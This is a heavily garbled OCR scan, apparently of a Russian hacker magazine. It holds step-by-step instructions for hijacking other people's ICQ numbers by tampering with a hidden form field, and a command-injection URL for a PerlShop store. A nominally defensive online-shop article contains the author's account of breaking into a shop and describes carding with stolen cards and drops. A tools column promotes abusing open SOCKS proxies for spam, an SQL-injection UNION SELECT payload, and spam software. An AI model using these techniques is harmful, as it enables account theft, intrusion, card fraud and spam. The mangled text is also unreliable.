что этот номерок осядету тебя надолго. Но край- 
не не советую стучать в эти номерки и чего-либо 
просить — минимум отделаешься игнором ;). 



□ Как привязать пятизнак к мылу? 

До недавнего времени считалось, чтоу пятизна- 
ков не можетбыть праймари-мейла и восстано- 
вить пароль от пятизнака невозможно. Однако 
теперь это стало возможно при помощи лока- 
лизованных версий аськи, таких как, например, 
НаппЫег-ІСО (версий много, но используем 
русскую — роднее =)). 

Итак, расскажу все по порядку. Для начала идем 
на официальную страничку Шр://ісд.гатЫег.ги. 
гделицезреем скрин с красивым номером ІО- 
ІЮ (думаю, врядли ону них есть ;)), а справа от 
него видим предложение скачать ПаппЫег-ІСО, 
что мы и делаем. Скачав и установив програм- 
му, смело запускаем и видим предложение 
ввести номер ІСО и пароль, логинимся со своим 
пятизнаком, который желаем привязать к мылу. 
Открывается окошко регистрации, в котором нам 
предлагают либо ввести свой логин на Рамбле- 
ре, если такой имеется, либо зарегистрировать 
новый. В целях безопасности я все же рекомен- 
дую зарегистрировать новый ящик, который ни- 
кому не будет известен, так как именно он будет 
привязан к нашему пятизнаку. На следующем 
этапе нам предлагают ввести пароль и секрет- 
ный вопрос с ответом на него, пароль на нашем 



пятизнаке изменится на пасс от мыла. 

Такчто вводим либо свой действующий пароль, 
либо что-то более изощренное, чем «дѵѵеНу» ;), 
После этого, наконец, логинимся в номер, 
бережнозаписав перед этим адрес привязан- 
ного мыла в блокнотик. Все, на этом процедура 
привязки завершена. Чтобы восстановить 
пароль от своего пятизнака, идем на страничку 
ШрУ/іб.гатЫег.ги/зсгірі/гетіпсІег.сді . вводим 
логин своей почты на Рамблере, которую 
привязали к пятизнаку, после чего отвечаем на 
свой секретный вопрос и устанавливаем новый 
пароль. Пароль на нашем пятизнаке, соответс- 
твенно, тоже меняется. 

Эта система применяется нетолько к пятизна- 
кам. Также, вследствие этой фичи, появилось 
много риперов, которые, продавая пятизнаки за 
копейки, с помощью этого метода возвращали 
их обратно. Поэтому хочу рассказать, какузнать, 
привязан ли номер ІСО. Для этого достаточно 
глянуть инфу номера в клиенте 01 Р ( ѵѵѵѵѵѵ.дір.ги і 
на вкладке «Дополнительно» окошка «Инфор- 
мация». Там мы можем увидеть та кую же запись, 
как на скриншоте «Привязанный номер». 

Это значит, что номер привязан. Логично ;). 

Если номер присобачен, например, к папа.со.іі . 



>Привязываем 10001 =) 

ЗиЦкс*; ІС<^ Ѵ/еЬ РедіяЬгэІіогі 

Ргфін: "ІСф рро &п ^іс^і ^ А<№де5 &ойк ( і АІЙ МсЫё АІёг* 



НЫІ0 р 

СопдгаІиІаІіопзІ Ѵои сап п оѵ/ Іаке ап асііѵе рагё іп Іііе ІСО 1 соттипііу 1 зеіѵісеБ изіпд уоиг пеѵ/ ІСО питЬѳг: 1С001. 

- То Ьа &Ы&І0 Іпдіп го !0О загѵісаз и&іпд вНИёг у пи г ІСО ПиппЬаг &г етэіі лПігТйяк, пііпк ТНо ІОІІОгиѵтд Ііпк ІО аПапН упиг а то 
I СО пц тЬ @г Ы |р /Ллуаѵ-у іс^ с о т/г ед і != І в г/ргпзі І_аІІап Іп р Іп р 
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Время работы 
брута 


ГРБЬги1:е2/и<іс 
Рго ППС* 


ІРБЬги1е2/исІс 
Рго ЗЕ ППС* 


15 минут 


12,3 


15,6 


30 минут 


19,1 


26,4 


1 час 


20,3 


31,7 


2 часа 


18,3 


34,3 



> Сравнительная таблица 



то отвязать первичный е-таіі можно, пере- 
привязав его к другому мылутого же папа.со.іі . 

И соответственно, Рамблер режется Рамблером. 

□ Ніті-инъекция на страницах іся.сот 

Как и многие программы мгновенных сообще- 
ний, интернет- клиент I СО не лишен своих раз- 
личных недочетов и уязвимостей. Сейчас я по- 
ведаю тебе о свеженьком баге в ѴѴНІТЕРАѲЕ5 
ІСО, благодаря которому™ сможешь получить 
практически любой понравившийся ІЛ N . 

Итак, толчком для исследований стала нашу- 
мевшая новостьавтора популярного альтерна- 
тивного интернет- пейджера СНР( дір.ги ). 

Іп^ сообщил о том, что его III N каким-то образом 
привязали к локализованному е-ппаіі без его 
ведома. В связи с этим ІпГом досрочно была 
выпущена новая альфа-версия 100-клиента 
ОІР, с помощью которой стало возможноузнать, 
к какому конкретно локализованному е-таіі- 
адресу привязан или не привязантвой элитный 
номерок. Эта новость заинтересовала гуру ІСО- 
хакинга с ником ТурисТ — Алексея Шакирова, 
и он вспомнил о том, что зимой этого года, копа- 
ясь в НТМЕ-кодахѵѵеЬ-ресурсов ісд.сот . он на- 
шел интересные строки: «<іприбуре="ЬісІсІеп» 
іб="иіп» пате="иіп» ѵаІие='ЧагдеІ иіп"» — и пы- 
тался при помощи банальной подмены номера 
получить на свой е-таііего пароль. В итоге, 
докопаться до истины оказалось легко, а позже 
он поделился ею со мной. Суть бага, к великому 
сожалению, оказалась примитивной. 

Итак, опишу пошагово действия, которые нас 
интересуют. 

Во-первых, необходимо дать понять серверу, что 
ты — друг, и нашим первым шагом станетудачный 
логин на страничке ѵѵѵѵѵѵ.ІСО.сопп . Для этого тебе 
потребуются любой ІЛ N и правильный парольот 
него. Конкретнее, нужно зайти на ЫірзУ/ѵѵѵѵѵѵ.ІСО.сот 
/гедізіег/етаіі абасЬ.рбр и сделать удачный 
логин. Далее вбей в адресную строку браузера 
« ЫірзУ/ѵѵѵѵѵѵ.ІСО.сот/гедізІег/етаіІ абасЬ 
з1:ер2.рЬр » и жми «Епіег». 



(Товарищ! Перед тем как нажать «Епіег», поду- 
май, какой могущественной силой обладаетэта 
кнопка). 

Вторым шагом будетсохранение странички 
к себе на винчестер. Для этого выбери в меню 
браузера «Еііе 5аѵе Аз» и сохрани страничку 
локально. 

Действиетретье, какуже упоминалось выше, 

— это простая подмена понятий, а именно 
необходимо отредактировать сохраненную 
страничку. 

Итак, открываем НТМб-код сохраненной 
паги в блокноте (правый клик мыши по файлу 

— «Открыть с помощью -> ЫоіерасІ»). Далее 
при помощи поиска («Сб+Н», «Найти и заме- 
нить») находим тот номер ІСО, с которым мы 
прилогинились, то есть ищем строку «<іприі 
1уре="ЫсІсІеп» ісі="иіп» пате="иіп» ѵа1ие="наш 
уин, с которым мы сделали удачный логин">». 

В этой строке меняем наш III N на ІЛ N , который 
хотим заполучить, и сохраняем весь этот 
НТМЕ-фарш. Также нам придется найти и по- 
менить строки «етаіІ_а1:1:асИ_5І:ер2.рЬр» на 
« ЬбрзѴАллллл/.ісд.сот/гедізбг/егпаіІ абасб 
5Іер2.рЬр ». Делается это для снятия локаль- 
ности нашего нового НТМб-кода. Сделано? 
Теперь браузер будет видеть страницу не как 
локальную =). 

«И в чем тут замес?» — спросишь ты. Так вот 
теперь необходимо сделать самое главное. 
Открываем страничкус новым кодом. В поле 
«Пароль» вписываем пароль от старого 1Л1М, 

!с которым мы совершили удачный логин. Впи- 
сываем в поле «Е-таіі» наш или свежеза ре- 
гистрированный е-ппаіі-адрес. Жамкаем пимпу 
«51ІВМІТ». 

Теперь все просто и понятно — на наш почтовый 
адрес падает письмо с конфирм-кодом от ІСО 
Іеат, в котором будет написано, что-то вроде 
этого: «Привет! Твой номерок54321 .Желаешь 
подтвердить регистрацию е-таіі абасбтепсі? 
Тогда нажми на ІЭ Р б из нашего письма». 

А вот что произойдет послетого, какты нажмешь 



б) Рб из письма, увидеть сможешьтолькоты. 
Здесьописанатолько одна сторона нового бага, 
и во избежание повального угона номеров (при- 
вет, баг на ВІ6Е00Т.С0М) я не стану говорить 
о том, как полностью взять контроль над конк- 
ретным номером и какие номера были захва- 
чены в результате проведения экспериментов. 
На сегодняшний день найденная уязвимость 
уже отнесена к разряду критических, так как 
с ее помощью можно изрядно наломать дров. 
Поэтому было принято решение немедленно 
осведомить работников компании МігаЬІІіз, 
которые, в свою очередь, «оперативно» фиксят 
НТМб-код своихѵѵеЬ-ресурсов. Но, как всегда, 
не до конца... =)□□ 

> Номерокадмина 
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ММШОѴѴ5 



гаЕшжз® 

Стоит ли геймерам 
переходить на новую 
операционную систему 
от МісгозоП? Чем десятая 
версия ОігесіХ лучше 
предыдущей? Специальное 
расследование «РС ИГР»! 



КИИ §®®ѳ 

Аналитическо- 
информационный материал 
о самых значимых играх и 
событиях прошедшего года. 









Зрелищный и 
увлекательный экшен, в 
котором можно разнести 
в пух и прах парочку 
не в адских казино. 

■шэражаа 

Мария Шарапова, Роджер 
Федерер, Елена Дементьева, 
Ллейтон Хьюит и другие 
звезды мирового тенниса в 
реалистичном спортивном 
симуляторе. 















^ взлом 



ЗАЩИТИ СВОИ ИНТЕРНЕТ-ШОП 



В своих предыдущих статьях я уже несколько раз упоминал о тем 

“ іших дней. Кто-то, обороняясь, создает новые средс- 
: преодолеть. Сетевая гонка вооружений -Рюбыден- 
Йіалистов по информационной безопасности. Но вот 
~~ баррикадами обороняющихся или 
, пожалуй, никто не даст однозначного 



:тр 

ров 



ем: 
в и сп 



бизнеса. Увы, но таков 
тва защиты, а кто-то с 
ное явление для хакер 
дилемма: какую сторонущыб 
принять позицию атаку: 
ответа. Важно понять одн 
примем противоположну: 



мать не строя невозможно. Поэтому в этой статье мы 



(ивычной на 



лучше защитить собственный интернет-магазин и уб.ере 
их клиентов. 



строну защиты, 
ідь от атакующе 



расскажу, как 
и стороны сво- 





□ Угроза взлома 

Допустим, ты решил открыть свой собственный 
интернет-шоп, принимающий оплату по кре- 
дитным'^ ртам. Почему именно по кредиткам? 
Да потому что-кредитка сейчас есть у каждого 
втор о го. чел о-века, следовательно, количество 
твоихді-оТенцйальных клиентов будет гораздо 
вышеБ нежели при оплате товаров в шопе при 
помощи ѴѴеЬМопеу. Пусть, к примеру, втвоем 
интернет-магазе будут продаваться ноуты, каме- 
ры, мобильники и прочие дорогиетехнические 
девайсы, а доставка осуществляется как в стра- 
ны СНГ, так и в Западную Европу и ОША.ТсГесгь, 
как ты понимаешь, создаваемый магазин сулит 
достаточно крупный ежемесячный денежный 
оборот, требующий постоянного контроля. ■ 

Но речь сейчас не о продажах, а о защихецэтих 
продаж. 

Разужтвой шоп принимает к оплате кредит^-. - 
ныекарты.то первое, на что следует обратить 
внимание; — это хранение данных о кредитках 
твоих клиентов. Представляешь, какупадет 
репутаідия-твоего магазина, если - с кредитных 
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карт клиентов начнут пропадать дел ежньГе 
средства в весьма приличныхюбъемах? Такой 
ситуации нё^ьзя додустить ни в коем случае. 
Поэтому хранить дан н'ыех) кр.е-Дитках клиентов 
в базе в незашифро ванном виде категорически 
не рекомендуется! Есть несколько вариантов 
решения проблемы: . . 

1. шифровать данные и сохранять в бззе'на 

сервере; . '' ь 4 ;. г- 

2. удалять информацию о выполненных заказах у 
с сервера, на котором стоит щоп; 

3. использовать отдельный сервер под БД-, 
хранящий бэкапы заказов и физически не свя- 
занный с сервером интернет-магазина. 

Первый способ мен.ее геморройный, нежели 
остальные, но он имеет несколько недостатков. 
Во-первых, нужен криптоустойчивый алгоритм. 

- Обычно интернет-шопы используют просто МуЗОБ- 
чшифрование, хэши которого сбрутить не состав- 
ляет оербо го труда. Иногда встречаются более 
мудрен+бГеалгОритмы (я сталкивался с уникальными, 
разработанными специально под конкретный шоп), 
хранящие свои'ключи опять же в МуЗОБ-базе, что . 







может иметь негативные последствия. В порядке 
альтернативы, можно.не использовать базу для 
хранения йнформации о заказах. 

Достаточ но вспомнить-известную торговую 
тележку- РегІЗИор. В этом движке вся информа- 
■ция ощаказах хранится в каталогах сизіотегз 
и огбегз (плюс два вспомогательных каталога .- 
Іетр^сизіотегз и 1етр_огбег5). Кстауй, именно 
■ в этой торговой тележке был найден баг,- поз- 
воляющий выполнять произвольные команды 
на/Сервере. Нетрудно-догадаться, что файлы, 

_ -содержащие да иные о заказах и доступные 
на чтение, быстренько отправлялись в виде * 
бэкапа на винчестер «доброжелателям». Если 
' тёбе-интересно, цакэто все осуществлялось, то 
можешь пройтись по л инку одного из бажных 
. рндайн-шопов надвижке РегІЗНор (шоп давно 
за брошен, “Так что никакого вреда кардхолдерам 
ты даже при.желании не нанесешь ): 

ЫсДр: //зЬасІом. суЪегроосЬ. сот/сді- 
Ъіп/регІзЪор . сді?АСТІ(Ж=Х]тізраде&1: 

. Мзраде=| 1з; &ОЕБЕК_ІБ=53 06092 89 
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> Популярный сЬескоиІ 



Уязвимость скрывается е параметре іЬізраде скрипта 
регівбор.сді и позволяет атакующему выполнять произволь- 
ные команды на сервере (I твоя_команда;). Не буду подробно- 
описывать баг — не об этом сейчас речь, но при желании ты 
всегда можешь найти нужную- инфу в багтраке. 

Так вот, возвращаясь ксути вопроса, если не хранить данные 
в базе, то их необходимо защитить каким-то иным образом. 
Многие админы шопов на печально известном РегІЭНор'е 
в конце концов додумались й'-стал и удалять информацию 
об уже выполненных заказах, то есть на сервере при этом 
уже нельзя было поживиться данными о двух-трех сотнях 
кардхолдеров (владельцев кредитных карт). Многие крупные 



скрипт перезапишет измененные файлы на оригинальные. 
Однажды, ломая один из онлайн-магазинов, я столкнулся с 
-забавной ситуацией. На сервере стояла РгееБЭй (версию 
ядра не помню, но это и не столь важно), права у меня были 
поЬобу, но имелась в наличии дйра -на 777 и Іеісіі :). Обра- 
довавшись, я собирался залить веб-шелл, но нетут-то было 
— всезаливаемые мной файлытут же удалялись, -причем с 
редактированием файлов дело обстоялотак же (довольно 
редкий случай защиты — примечание редактора). Сначала 
мне, естественно, показалось, что я тронулся рассудком.,. но, 
найдя в этой же диретекстовый файл, содержимое которого 
незаменялось, я понял истинную причину происходящего. 




>На дискеты мог бы 
найти исходники 
а нтифрод -Системы, 
но'... не найдешь :). 
Цена таких^систем 
— десяткй тысяч 
американских 
президентов. 



«КАК ТЫ ПОНИМАЕШЬ, ВОЗМОЖНОСТЬ ИМЕТЬ 
ОТДЕЛЬНЫЙ БЭКАПНЫЙ СЕРВЕР ЕСТЬ НЕ У ВСЕХ, ПОЭТО- 
МУ ИНОГДА ИНФОРМАЦИЯ О ЗАКАЗАХ ОТПРАВЛЯЕТСЯ 
ПРЯМИКОМ НА МЫЛОАДМИНА/САППОРТА МАГАЗИНА» 




интернет-магазины сейчас р г абота.ют .подобным образом: 
заказ обрабатывается в-теч.ение-царъі часов и данные о нем 
л ибо удаляются, либо отправляются На бэкапный сервер,..Вот 
тут — стоп. Как ты понимаешь, возможность иметь отдельный 
бэкапный сервер есть неу всех, поэтому иногда информация 
о заказах отправляется прямиков на мыло админа/саппорта 
магазина (находящеесФна совершенно другом сервере). 

Что и говорить, задумка хорошая: клиент оформляет покупку, 
данные озаказе отсылаются на мыло саппорту шопа, а на 
сервере в базе ведется лишь статистика заказов. Однако. 

■ сспвредіенем хакеров стал не устраивать такой расклад, и 
они-начал и. патчить движки магазинов. Например, втом-же 
Ре г15 Но р'е'за частую добавляется еще одно мыло, принадле- 
жащее отнюдь не владельцу шопа :). 

Избежать этого можно достаточно просто. Необходимо 
написать и запустить на сервере, ркрипт, провёряющий дату 
измененця'скриптов.,, имеющих отношение к движку интер- 
нету ^ а газ ина:. В юдучае обнаружения несоответствия, наш 
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Шоп тот, к слову, я все же поимел, но об этом в другой раз. 

Эта история свидетельствует ли шьобюднюм — о необходи- 
мости контроля над изменяемыми файлами, находящимися . 
на сервере. Написать скрипт на Регі или на РНР не сасгавит " 
особоготруда. В Регі есть удобная функция віаі; О, имеющая 
несколько переменных, в том числе и"$’гпбте, отвечающую 
за время последнего изменения файла. Возможностей реа- 
лизации предостаточно, стоитлишь немного пофантазиро- 
вать :). Еще один важный момент — это логирование.. Здесь 
следует чётко определиться с тем, что логировать нужно, а 
что нёт.'-Следующий перечень включает в себя несколько 
пунктов л о гиро ван ия: -■ 

1. попытки редактирования файлов на сервере; 

2. добавлениѳ/удаление файлов на сервере; 

3. внешние изменения параметров, передающихся скрипта- 
ми интернет-магазин^. 

Разумеется, это лишь маленькая часть того, что необходимо 
логировать. Первые два пункта можно напрямую связать со 



>Легальный сетевой 
б из нес уже*да в н о 
нашел-свое место. в 
С етй , п р обп е мал и ш ь 
в том., что и мошен- 
ники не’обошл и ее 
сторонЬй. 




> Внимание! Инфор- 
" мация приведена 
исключительно в 
ознакомительных 
целях-! Ни автор, ни . 
редакция за твои 
действия ответствен- 
,.щостй не несут! 
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сѴрйптом, контролирующим изменения файлов. 
А третий пункт, впринципе, можно не брать 
в оборот, так как он имеет непосредственное 
отношение к движку самого интернет-мага- 
зина и заслуживаетотдельного_внимания. 

В последующей части статьи я еще упомяну об 
антифрод-системах и методах^ихреализации. 
Сейчас нужно запомнить одну важную, деталь: 
кто предупрежден — тот вооружен. 

Крометого, я бы советовал сделать пару «уло- 
вок» для атакующих. Это может быть инсцени- 
ровка уязвимости скрипта (особенно прикольно 
вЪіглядит инсценировка БЦІ-инъекции =)), 
наличие левого конфига, содержащего в себе 
такой же левый аккаунт кбазе и много чего еще 
Мне не часто встречалисьтакие «уловки», но, 
поверь, иногда они могут помочьтебе больше, 
чем многое из-сб'иса иного выше. Главное, чтобы 
все выглядело максимально правдоподобно. 
Здесь, как и в предыдущем случае, ют тебя 
требуется только смекалка, фантазия и сообра- 
зительность. 



— возврат товара в онлайн-магазин илира - ■ .зывать, что товар возврату не подлежит, кроме 

- аукцион, которые продают нематериальный случаев, предусмотренных Законом РФ «С 

продукт (информацию, музьТку щ. д.). Как пра- защите прав потребителей», если официально, 

вило, втаком случае после совершения покупки" магазин зарегистрирован в России. Неплюхо' " 
«клиент»требует вернуть его средства, аргумен- было бы иметь и юриста, специализирующего- 
тируя свои действия ненадлежащим качеством ся на данных вопросах, но это уже отдельный 
продукта. Надо за метите что на многих ру- разговор. 

аукционахгга кая тема прокатывала достаточной^^ Едемщалыше. Следующая угроза"— покупка 
долго, развязывая руки мошенникам. товара в твоём интернет-магазине по ворован- 

Ещеодна «замечательная» схема была ным кредитным картам. Эта опасность является 

придумана специально для одной гТз крупных одной изРаиболее серьезны*, й "ей следует 

российских платежных систем, сотрудничаю- ..уделить особое внимание. Дело" втом, что такие 

«ПЛАТЕЖКА ВЫНУЖДЕНА БЫЛА 
УДОВЛЕТВОРЯТЬ ТРЕБОВАНИЯ «НЕЗА^ 
ДАЧЛИВОГО КЛИЕНТА», ТАК КАК ИМЕ- 
ЛА ДОГОВОРЕННОСТЬ С АУКЦИОНОМ» 



□ Угроза мошенничества 

Если ты думаешь, что угроза йзлома является 
основн'бй опасностью для твоего бизнеса, то 
глубоко ошибаешься. Как известно, в России 
всегда было-мРожество аферистов всех мастей, 
и е'сл-ід-тьі полагаешь, что поле их деятельнос- 
ти— Городской рынок, то ты яр но отстал от 
жизни. Сеть Давно объединяет фродеров (от 
английского слова «ІтаисІ» — «мошенничес- 
тво», <^гаисіег» — «мошенник») различных 
направлений. Учитывая принцип работы твоего 
интернет-магазина (отсылка товаров в страны 
"СНГ, оплата по кредитным картам), можно 
выделить несколько категорий нежелательных 
«клиентов». Приводить список я не будуцгак-ка'к 
полный перечь составить попросту невозможно. 
Поэтому перейдем к рассмотрению обманных 
схем и методов защиты от них. -*\ - 

Первое, с чем сталкивается, пожалуй, каждый 
крупцый финансовый, проект, — это клиенты- 
мошённикиЛНа моей памяти было несколько 
ус пепин ы>ф род- схем. Самый простой пример 



щей с одним из аукционов (название платежки ~ 

указывать нё" в моей компетенции „да и, честно 

говоря, я непомню). Сутыее заключалась в 

том, что человек заводил себе Два аккаунта в 

. 

платежке, за-тем создавал на аукционе лот оп- 
ределенной сто-импетии саму себя его покупал. 
После этого он писал жалобу администрации . 
платежной системы о том , что товар, купленный 
им на аукционе, выслан ему не был, и просил 
вернуть его деньги. Платёжка вынуждена была 
удовлетворять требования «незадачливого 
клиента», так как имела договоренность с аук- 
ционом. В результате мошенник получал сумму, 
р'авную стоимости его лота. Кстати, одного из 
та-ких предприимчивых людей примерно год 
назад приняли сотрудники соответствующих 
■ структур и отправили в места не стольотдален- 
цчыещак .что делай выводы. Но, на самом деле, 
та~і?и| ситуации можно предупреждать. 
Аукционам необходимо снять ответственность 
за выставляемые лоты (многие в последствии 
так и сделали-),. А в интернет-шопе стоит ука- 



т * 

„....покупки создаюттеб'е проблемы как с банка- 
ми-/ платежным и системами, так и с клиентами, 
что негативно сказывается на репутации твоего 
шопа (ад-начит, и на прибыли/количестве про- 
даж), .Если твой магазин принимает карточки 
всех ведущих международных платежных • . 
’систём (Ѵіза/МазІегСагсІ/ВІБСрѵегу/Атёгісап 
' ■ €хрте55); г то7скорее всего, «вбивать» в твоем 
у магазе буд'ут кредитки, 'стыренн^іе с соседнего' . 
амертжого шопа. 

_ -Конечно, существуют различные антифрод-сис- 
тем’ы, сравнивающие введенные данные: место 
жительства и географическое положение ІР, 
локальное время, язык браузера ит.д., но все 
они несовершенны. Сам процесс выглядит 
" . следующим образом: берется кредитка (точнее, 
информацйящодержащая номер карточку- 
сѵѵ-код, срок окончания действия карты, ФИО ’ ^ 
кар-дхолдера, его, место жительства ит. п.) ; вы- 
бирается соке, находящийся там же, где прожи- 
вает кардхолдер, после чего. карта вбивается в 
форму оплаты втврем магазине. Если ты будешь 
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использовать что-либо наподобие сНескоиі 
для проверки валидности вбитых картонок, то 

сможешь бытьувере’нным втом, что такая карта 
V- " 

и такой кардхолдер действительно существу- 
ют. Но гарантий, что данные о кредитке вбил 
именно ее владелец, нет. 

Именно послетаких махинаций большинство 
зарубежных интернет-шопов попросту не шлют 
свои товары в страны СНГ. Но ’и этоТіх не спа- 
сает. Дело втом, что предприимчивые русские 
вербуютдропов — людей, .готовых принять товар 
на свой адрес в США или в страШх Западной Ев- 
ропы. Вербовка происходит пЬ-разному: кто-то 
соглашается сам и работает под определенный 
процент от стой мости товара, а кого-то обманы- 
вают, например, под видом благотворительных 
акций. В таком случае схема повторяется: 
вбивается карточка, указывается адрес дрогга'в 
соответствующей стране и заказуспешно офор- 
мляется. Можно ли этому как-то противостоять? , 
Можно, сейчас я расскажутебе как. 

Первый способ — прозвон. Его суть заклю- 
чается втом, что клиент должен позвон : итѴв - 
саппорт магазина и подтвердить свой заказ, 
назвав данные, указанные им на сайте шопа,. . 
Многие зарубеж-ные магазины и финансовые 
организации успешно практикуют этот в'ид за- 
щиты от мошенников, однакои здесь есть’сла- 
бые стороны. Проблемаюаключа§т-с‘я втом, что 
зачастую прозвон можетсо.вершйтьй сам дроп 
или человек, сотрудничающий с. нежелатель- 
ными «клиентами» и прекрасно владеющий 
нужным иностранным языком. Буржуѵі не зря 
иногда требуют указа ни^ттп (гр.о^Ьег тісйе 
пате — имя матери), боб (сіаіе оф ЬігіГі — дата 
рождения) или звп (индивидуальный номер 
страховки), но и это не всегда их спасает. 
Поэтому была создана еще одна преграда на 
пути мошенников — сканы документов. Если ты 
интересуешься оружием, то могзаметить, что 
все российские оружейные интернет-магазины 
при оформлении покупки требуют обязатель- 
ной высылки ксерокопий паспорта и лицензий 
на приобрбтениетогр.или иыого”вида оружия. 

По Т^кой же'р^емещетакдавно стал и работать 
г- .- 

Г % ’ г ' 

, . - - 
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« Бааа: ^Похищенные паспорте» 

РйгѴОи: МоСийіі 

Деге □бнйБЛЕ^йіОктяЁрь 2000 года — — 

Т І? : 1 4 ■ ****** * ши**-" 

( ) Нйй&Я Ціша. 1 ОДП руб-гШй 
Вы вклмомнтві 300 рублей 

Описание/ бааэданнми «< поннщенньш паспорта» 
сддя д^н-т ди 

* уір иі щщ ті 

Ь-кГрагіНЧпЫКі ПЗ'ІТМрТЛМ- 

* м.пиі^н ір *ХД4Н СНГ; 

■ г- ■; подымай о грдсд-ансп&к; 

* а эдевдчімім 5 дока; 

* Пр4Пт№Япі 
» б >14 ГК АН ; 

Іе данные: нпличеспю лапиеей — 

Йр*6фЧ-г Н> Йяііід іІЬіфі 1 ІлдМмкі р 



> Продажа базы по данным украденных паспортов 



и крупные интернет-магазины. Причем зачас- 
тую он ил росят отослать им сканированную 
кредитную карточку, данные которой были 
вбиты на сайте. Про паспорта и водительские 
удостов'е рения я вообще молчу. Иногда нужны 
даже сканы денег. 

Надоіотметить, что этот способ являетсѴдоств-. 
точно эффективным, но и он не даетстопроцен- ■ 
тной гарантии безопасности. Злоумышленники ■ 
могут использовать чужие паспортные данные. Г ■ 
или поддельные сканы документов/кредитных 
карт, Поэтому необходима жесткая проверка 
всех присылаемых копий документов. Кстати, 
абсолютно легально можно приобрести базу 
данных краденых/утерянных паспортов РФ и 
по ней проверятьдокументы, присланные кли- 
ентами, но этот вариант не панацея от всех бед. 
Любому серьезному финансовому проекту 
нужна мощная антифрод-сй'стема. Недав- 
но ко мне обратил иеь люди из достаточно 
серьезной компании с просьбой написания 

подобного рода системы/Они были готовы 

■ " 

заплатить весьма пр-иличкую сумму. за ее 
реализацию. Но, какты понимаешь, создание 
идеального анти фрод-ба рьера '-^скорее 
мечта, нежели реальность. О дна'ко это .отнюдь 
не говорит о бесполезности существующих 



систем. Напротив, пѳ^татистике, средний 

антифрод позволяет предотвратить до 40% 

попыток мошенничества, что не та к уж и мало. 

Как бы там ни б'ыло, все имеющиеся способы ’ 
■ ' ..г 

защиты неюб-ход'ймо комбинировать между . 
собой, — только в этом случае ты получишь 
наиболее сильную системущер^ификации кли- 

.,ентов."И запомни простою правило: некогда 

* 

.нельзя недооценивать противника: Следуя 



_ этим нехитрым инструкциям, возможно, ты 
сумеешь сохранить свой сетевой бизнес в 
целости и сохранности. 



□ РозІБсгірІит 

В последнее время многие фроДнр.ы полностью 
отказались от«работы» с российскими интер- 
нет-магазинами. Прич иной тому послужила 
повышенная активность правоохранительных 
органов в ру-доне. Однако 'всё же никогда не 
пренебрегай защитой своего ресурса. По_мни 
пословицу: скупой платйтдважды — не пытайся 
сэкономить на антифроде или специалистах 
по информационной безопасности', этб выйдет 
тебе еще дороже. Конечно, в одной статьетрудно 
описать все возможные угрозы и методы защиты 
от них. Я только хочу, чтобы ТЫ ПОНЯЛ ОДНО: угрозы 
были, есть и будут.ІЗіІ 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




ПРОГРАММА: 80СК5 ЗСАІЧІЧЕР 
ОС: ѴІМ&0ѴЗ 2000/ХР 
АВТОР: N1 СОТ 1 1МЕ 




> Отличный зоскз-сканер 

Суть этой замечательной тулзы состоит в 
сканировании диапазона ІР-адресов для 
определения открытых портов, на которых 
могут крутиться сокс-демоны. Как ты пони- 
маешь, многиеадмины не запрещают 
соединение с их соксом извне, что позволяет 
удобно использовать чужой сервер в качестве 
бесплатного сокса :]. Такая схема полезна для 
составления большого сокс-листа, например, 
для спама или даже для сокс-сервиса. Однако 
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помни, что лучше юзать цепочки соксов -такбе- 
зопаснее. Из основныхдостоинств тулзы отмечу: 

• указание диапазона маски ххх.ххх.ххх.* (то 
естьсканирование255 ІР-адресовза один раз); 

• многопоточность (количество потоков можно 
задать самому); 

• чекер отсканенных соксов; 

• удобный графический интерфейс. 

Кстати, диапазон ІР-адресов ты запросто 
можешьуказывать нужной тебе страны и даже 
провайдера. В принципе, не составиттруда 
написать и простенький чекер географического 
положения соксов, если ты будешь занимать- 
ся массовым сканом :). Одним словом, тулза 

— гтшві: баѵе! Благодарим человека, скрываю- 
щегося подником пІсОТІІпе, и пользуемся =). 

ПРОГРАММА: НТТР ІІЧТКІЮЕК 
ОС: ѴІМ&0Ѵ5 2000/ХР 
АВТОР: ОХРЕ 

Зачастую, занимаясь раскруткой очередной 
ЗОБ-инъекции на МЗЗОБ-сервере, надоедает 
вбивать однотипные запросы, направленные 
на извлечениетаблиц/колонок из базы данных. 
Поэтому я задался целью найти софт, обладаю- 
щий подобными возможностями. Искать через 
некоторое время мне надоело, и я уже собирал- 
ся наваять собственный скрипт, когда один из 
моихзнакомых посоветовал попробоватьтулзу 
под названием НТТР Іпігисіег. Слив и установив 
утилу, я, к своемуудивлению, обнаружил, что 
она обладает весьма полезными в повседнев- 
ной работе функциями: 



> Автоматическое извлечениетаблиц/ко- 
лонок из БД 




• работа с НТТР Неабегз; составление запроса 
вручную, получение ответа от сервера и т.д. ; 

• конструктор НТТР-запросов; 

• встроенный браузер; 

• Ваве64 Епсосіе/Оесосіе, ІМ\ІЛІЕ ЕпсосІе\ 
йесосіе; 

• прокси-чекер (удобная работа с листом, раз- 
деление на мертвые и живые проксики); 

• хэшированиеалгоритмами М05,5НА-1,5НА- 
256.5НА-512, НМАС5НА-1, МАСТгірІеОЕЗ; шифро- 
вание алгоритмами 0Е5, ТгірІеОЕЗ, РС2, П5А; 

• возможность автоматического извлечения 
таблиц/колонок из базы данных при проведе- 
нии ЗОБИщесбоп. 

В частности, последняя функция тулзы была 
реализована с помощью нехитрого запроса: 






ІШІСЖ АЬЬ ЗЕЬЕСТ 1,2,3, ТАВЬЕ_ЕАМЕ , 4 
ЕЕОМ ШЕ0КМАТІСЖ_8СНЕМА . ТАВЬЕЗ ; ІЖЕСЖГ 
АЬЬ ЗЕЬЕСТ 1,2,3, СОЫЖЫ_ЫАМЕ , 4 ЕКОМ 
ШЕОКМАТІОЫ_ЗСНЕМА. СОЫІМЫЗ 

Этот момент позволял более не ковырять руч- 
ками бажный ресурс, а использовать удобную 
формочку в НТТР I пігисіег на вкладке 5СН_ (кото- 
рая отнюдь не отменяла обязательного наличия 
прямых рук =)). В целом, скажу, чтоутила вполне 
может пригодиться тебе еще не раз. Поэтому на- 
стоятельно рекомендую иметь ее под рукой =). 

ПРОГРАММА: СІРЕСТМАНЕР V. 1 .6 
ОС: УІІЧСОУЗ/^ІЧІХ 
АВТОР: ѴЕІ_І_50ГТ 

Представление различного спам-софта в каж- 



І-ІТ - ИИ ІІЛЧ ДОЧіНі 

> Мощный спам-контроллер 

дом выпуске «Х-Тооіз» уже сталотрадицией, 
которую я и на этот раз нарушать не стану =). 
Скажу лишь, что сегодняшняя тулза — широко 
известный в спамерских кругах ОігесіМаіІег. 
Написан он полностью на Регі и включает 
в себя удобный контроллере всевозможными 
